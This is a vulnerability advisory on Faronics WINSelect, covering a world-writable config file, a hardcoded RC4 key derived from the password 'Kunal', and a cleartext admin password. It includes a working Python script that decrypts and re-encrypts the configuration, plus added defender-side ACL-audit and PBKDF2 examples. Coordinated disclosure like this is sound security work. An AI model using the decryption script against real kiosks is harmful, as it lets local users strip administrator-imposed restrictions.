Multiple Vulnerabilities allowing complete bypass in Faronics WINSelect (Standard + Enterprise)

Title

Multiple Vulnerabilities allowing complete bypass

Product

Faronics WINSelect (Standard + Enterprise)

Vulnerable Version

<8.30.xx.903

Fixed Version

8.30.xx.903

CVE Number

CVE-2024-36495, CVE-2024-36496, CVE-2024-36497

Impact

high

Found

01.02.2024

By

Daniel Hirschberger (Office Bochum) | SEC Consult Vulnerability Lab

The product WINSelect from Faronics is used to restrict the actions users can perform on a system and can also be used to implement a kiosk mode. Due to hardcoded credentials and an unsuitable application architecture, an attacker can decrypt the configuration file and retrieve the password that is used to configure the software. With this password, an attacker can completely disable the software.

Vendor description

"WINSelect - Allows you to easily control your end-users' Windows Experience without having to deal with GPOs. Need to Prevent Data From Leaving? Whether you're working on classified government files or the secret ingredient
for your famous lasagna, you need to protect your sensitive information from walking out the door.

Faronics WINSelect offers the ability to disable USB ports and disk drives. Now you can relax knowing your secrets won't be exported without your knowledge."

Source: https://www.faronics.com/products/winselect


Business recommendation

The vendor provides a patched version, which should be installed immediately. SEC Consult highly recommends performing a thorough security review of the product, conducted by security professionals, to identify and resolve potential further security issues.


Vulnerability overview/description

1) Read/Write Permissions for Everyone on Configuration File (CVE-2024-36495)

The application saves its configuration in an encrypted file which "Everyone" has read and write access to.


2) Hardcoded Credentials (CVE-2024-36496)

The configuration file is encrypted with a static key derived from a static five-character password which allows an attacker to decrypt this file.


3) Unhashed Storage of Password (CVE-2024-36497)

The decrypted configuration file contains the password in cleartext which is used to configure WINSelect. It can be used to remove the existing restrictions and disable WINSelect entirely.

By combining these issues any local attacker can disable WINSelect.


Proof of concept

1) Read/Write Permissions for Everyone on Configuration File (CVE-2024-36495)

WINSelect Standard saves its configuration in the following file:

C:\ProgramData\WINSelect\WINSelect.wsd

Every user has read and write permissions on this file by default:

Figure 1: The write permission is no problem as long as WINSelect is running, because it is locked by the process WSEngine.exe.

For WINSelect Enterprise the path for the configuration file is:

C:\ProgramData\Faronics\StorageSpace\WS\WINSelect.wsd
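A defender-side check for this condition, added here as an example and not part of the advisory or the vendor's software: it parses the output of icacls for the configuration file and reports any broad principal (Everyone, BUILTIN\Users, Authenticated Users) that holds a write-capable right, ignoring deny entries. The sample icacls output is constructed to mirror the default ACL described above; the principal list, the classification of rights and the audit_config_file helper are this example's own assumptions.

```python
import re
import subprocess
from typing import List, Set, Tuple

# Path of the WINSelect Standard configuration file named in the advisory.
CONFIG_PATH = r"C:\ProgramData\WINSelect\WINSelect.wsd"

# Principals that effectively mean "any local user" (example's own list).
BROAD_PRINCIPALS = {
    "everyone",
    "users",
    "builtin\\users",
    "nt authority\\authenticated users",
    "nt authority\\interactive",
}

# icacls simple rights (F, M, W, D) and specific rights that allow changing the
# file or its security descriptor (example's own classification).
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WA", "WEA", "DC", "DE", "WDAC", "WO", "GW", "GA"}

# Tokens that describe inheritance or the ACE type rather than a right.
ACE_FLAGS = {"OI", "CI", "IO", "NP", "I", "DENY"}


def parse_icacls(output: str, path: str) -> List[Tuple[str, Set[str], bool]]:
    """Parse icacls output into (principal, rights, is_deny) tuples.

    The first output line starts with the file path followed by the first ACE;
    continuation lines are indented; the trailing summary line is skipped.
    """
    entries = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()
        m = re.match(r"^(?P<principal>[^()]+?):(?P<aces>(?:\([^()]*\))+)$", line)
        if not m:
            continue  # blank line, summary line or anything that is not an ACE
        tokens = {t.strip() for grp in re.findall(r"\(([^()]*)\)", m.group("aces")) for t in grp.split(",")}
        entries.append((m.group("principal").strip(), tokens - ACE_FLAGS, "DENY" in tokens))
    return entries


def writable_by_everyone(output: str, path: str = CONFIG_PATH) -> List[Tuple[str, List[str]]]:
    """Return (principal, write rights granted) for broad principals with write access."""
    findings = []
    for principal, rights, is_deny in parse_icacls(output, path):
        if is_deny or principal.lower() not in BROAD_PRINCIPALS:
            continue
        granted = sorted(rights & WRITE_RIGHTS)
        if granted:
            findings.append((principal, granted))
    return findings


def audit_config_file(path: str = CONFIG_PATH) -> List[Tuple[str, List[str]]]:
    """Run icacls on a live Windows host and evaluate its output (not used offline)."""
    result = subprocess.run(["icacls", path], capture_output=True, text=True, check=True)
    return writable_by_everyone(result.stdout, path)


# Constructed sample in the layout icacls prints, modelled on the default ACL the
# advisory describes: "Everyone" holds full control on the configuration file.
SAMPLE_VULNERABLE = r"""C:\ProgramData\WINSelect\WINSelect.wsd Everyone:(I)(F)
                                       NT AUTHORITY\SYSTEM:(I)(F)
                                       BUILTIN\Administrators:(I)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Constructed sample of a hardened ACL: ordinary users may only read the file,
# and a deny entry for Everyone must not be reported as granted access.
SAMPLE_HARDENED = r"""C:\ProgramData\WINSelect\WINSelect.wsd NT AUTHORITY\SYSTEM:(I)(F)
                                       BUILTIN\Administrators:(I)(F)
                                       BUILTIN\Users:(I)(RX)
                                       Everyone:(DENY)(W)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for name, sample in (("vulnerable", SAMPLE_VULNERABLE), ("hardened", SAMPLE_HARDENED)):
        print(name, writable_by_everyone(sample) or "no broad write access")
```

Running the script offline evaluates only the two constructed samples; on a Windows host, audit_config_file() applies the same logic to the real output of icacls for the configuration file. For WINSelect Enterprise, pass the Enterprise path given above instead of the default.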

2) Hardcoded Credentials (CVE-2024-36496)

By analyzing the application with the API Monitor tool, we found that the application uses a hardcoded five-letter password, hashes it with the outdated and broken MD5 algorithm (no salt) and uses the first five bytes of the hash as the key for RC4. The configuration file is then encrypted with these parameters.

Figure 2: After starting WINSelect.exe the MD5 and RC4 algorithms are requested
Figure 3: When the login to the configuration of WINSelect is triggered via CTRL+ALT+SHIFT+F8, the configuration file is decrypted
Figure 4: The hardcoded password "Kunal" is hashed.
Figure 5: Output of the hardcoded password hash
Figure 6: The first five bytes of the hash are used to instantiate a key object.
Figure 7: The configuration is then decrypted with this key.

To simplify this proof of concept, the following Python script was developed, which automatically decrypts an encrypted WINSelect.wsd:

import sys
from binascii import unhexlify
import Crypto.Cipher.ARC4  # provided by the pycryptodome package
from hashlib import md5

# Key derivation as observed with API Monitor (see figures above): MD5 over the
# UTF-16LE encoding of the hardcoded password, first five bytes kept, zero-padded
encoded = "Kunal".encode("utf-16le")
hashed = md5(encoded).digest()
key = hashed[:5] + 11 * b'\x00'

# hardcoded key
#key = b'9d62e7dd580000000000000000000000'
#key = unhexlify(key)
#print(key)

def main():
    if len(sys.argv) != 4 or sys.argv[1] not in ("d", "e"):
        print("usage: %s d|e <input file> <output file>" % sys.argv[0])
        sys.exit(1)
    if sys.argv[1] == "d":
        decrypt(sys.argv[2], sys.argv[3])
    elif sys.argv[1] == "e":
        encrypt(sys.argv[2], sys.argv[3])

def encrypt(file_in, file_out):
    with open(file_in, 'rb') as file:
        data = file.read()

    # Re-encode the XML as UTF-16LE and encrypt it
    text = data.decode("utf-8").encode("utf-16le")
    encrypted = Crypto.Cipher.ARC4.new(key).encrypt(text)

    # The file starts with the UTF-16LE byte order mark (0xFF 0xFE), followed by the ciphertext
    with open(file_out, 'wb') as file:
        file.write(b'\xff\xfe')
        file.write(encrypted)

def decrypt(file_in, file_out):
    # skip the 2-byte byte order mark and read the rest
    with open(file_in, 'rb') as file:
        file.seek(2)
        data = file.read()

    # Decrypt the data (RC4 is symmetric, so encrypt() also decrypts)
    decrypted = Crypto.Cipher.ARC4.new(key).encrypt(data)
    text = decrypted.decode("utf-16le").encode("utf-8")

    with open(file_out, 'wb') as file:
        file.write(text)

if __name__ == "__main__":
    main()

3) Unhashed Storage of Password (CVE-2024-36497)

By decrypting the configuration file, the used password can be extracted at the beginning of the file:

<?xml version="1.0"?>
<KIOSK>
   <SECTIONS>
      <SECTION>
         <SID>194</SID><!--S_ID_ADMIN_PASS-->
            <RULES>
               <RULE>
                  <ID>121</ID><!--R_ID_PROTECTION_ON_OFF-->
                  <ENABLED>1</ENABLED>
               </RULE>
               <RULE>
                  <ID>148</ID><!--R_ID_PROTECTION_ON_OFF_ADMIN-->
                  <ENABLED>1</ENABLED>
               </RULE>
               <RULE>
                  <ID>116</ID><!--R_ID_ADMIN_PASS-->
                  <ENABLED>1</ENABLED>
               <DATA>
                  <PASSWORDSET>0</PASSWORDSET>
                  <ADMINPASSWORD>myadminpw</ADMINPASSWORD>
               </DATA>
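The hardened form of this storage, added here as an example and not the vendor's code: the vendor contact timeline reports that the fixed build uses PBKDF2 with SHA-256 and 600,000 iterations, and this script derives and verifies such a record with a random per-password salt and a constant-time comparison, in place of the cleartext <ADMINPASSWORD> value shown above. The record layout, the 16-byte salt length and the function names are this example's own assumptions.

```python
import hashlib
import hmac
import os
from typing import Optional

# Parameters matching what the advisory timeline (2024-06-10) reports for the
# vendor's fixed build. The salt length is this example's own choice.
PBKDF2_HASH = "sha256"
PBKDF2_ITERATIONS = 600_000
SALT_BYTES = 16


def hash_admin_password(password: str, salt: Optional[bytes] = None) -> str:
    """Derive a salted PBKDF2 record to store instead of the cleartext password.

    Record layout (example's own): "pbkdf2_sha256$<iterations>$<salt hex>$<hash hex>".
    A fresh random salt is generated unless one is supplied (used by the tests).
    """
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac(PBKDF2_HASH, password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return "$".join(("pbkdf2_" + PBKDF2_HASH, str(PBKDF2_ITERATIONS), salt.hex(), digest.hex()))


def verify_admin_password(password: str, record: str) -> bool:
    """Recompute the derivation from the stored record and compare in constant time.

    The iteration count and salt are read from the record itself, so records
    written with a different cost parameter keep verifying after an upgrade.
    """
    try:
        algo, iterations, salt_hex, hash_hex = record.split("$")
        if not algo.startswith("pbkdf2_"):
            return False
        salt, expected = bytes.fromhex(salt_hex), bytes.fromhex(hash_hex)
        count = int(iterations)
    except ValueError:
        return False  # malformed record: never treat it as a match
    candidate = hashlib.pbkdf2_hmac(algo[len("pbkdf2_"):], password.encode("utf-8"), salt, count)
    return hmac.compare_digest(candidate, expected)


def hardened_admin_password_element(password: str) -> str:
    """Render the <ADMINPASSWORD> element as it would look with a hashed value."""
    return "<ADMINPASSWORD>%s</ADMINPASSWORD>" % hash_admin_password(password)


if __name__ == "__main__":
    # "myadminpw" is the sample value from the decrypted configuration above.
    record = hash_admin_password("myadminpw")
    print(hardened_admin_password_element("myadminpw"))
    print("correct password accepted:", verify_admin_password("myadminpw", record))
    print("wrong password rejected:", not verify_admin_password("wrongpw", record))
```

Because the salt and iteration count travel with the record, verification does not need to know the parameters the record was created with, and two installations that use the same administrator password still store different values.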

Vulnerable / tested versions

The following version was tested, which was the latest version available at the time of the test:

  • 8.22.1112.886

Vendor contact timeline

2024-02-19 Contacting vendor through support@faronics.com and customerservice@faronics.com
2024-02-20 Vendor responds with an email address to which we shall send the advisory.
2024-02-20 Asking for encryption, vendor requests unencrypted communication, submitting advisory.
2024-02-21 Vendor confirms receipt, engaged with product and development teams.
2024-02-27 Vendor introduces additional contact, will coordinate further responses.
2024-03-13 Additional contact apologizes for delayed response, vulnerabilities already discussed internally. Asks for extension of release.
2024-03-14 Extending advisory release to coordinate with patch.
2024-04-10 Vendor has addressed the reported issues in a test build for the standard version, enterprise fixes will be incorporated soon.
2024-04-18 Giving feedback that the issue is still exploitable, proposing a better hash function and random UUID, linking to OWASP password storage cheat sheet.
2024-04-21 Vendor thanks us for the proposed fix, current patch must be released, but working on new version incorporating our feedback.
2024-04-23 Providing further feedback, especially regarding GPU attacks.
2024-05-27 Asking for a status update.
2024-05-29 Vendor's last email got stuck in their mailbox. The latest WINSelect patch was released in early May, now incorporates PBKDF2. Provides release and download URL. Reserving CVE numbers.
2024-06-10 We can confirm that PBKDF2 is used with SHA256 and 600000 iterations.
2024-06-11 Since the hardcoded password for the encryption is not fixed, we ask if this will be addressed as well. Vendor responds that this will be addressed in a future release.
2024-06-24 Coordinated release of security advisory.

Solution

The vendor has provided the patched version 8.30.xx.903 since May 2024, which can be downloaded from the following URL:
https://www.faronics.com/document-library/document/download-winselect-standard

The vendor provided the following changelog:
https://www.faronics.com/en-uk/document-library/document/winselect-standard-release-notes

Workaround

None

Advisory URL

https://sec-consult.com/vulnerability-lab/

EOF Daniel Hirschberger @2024
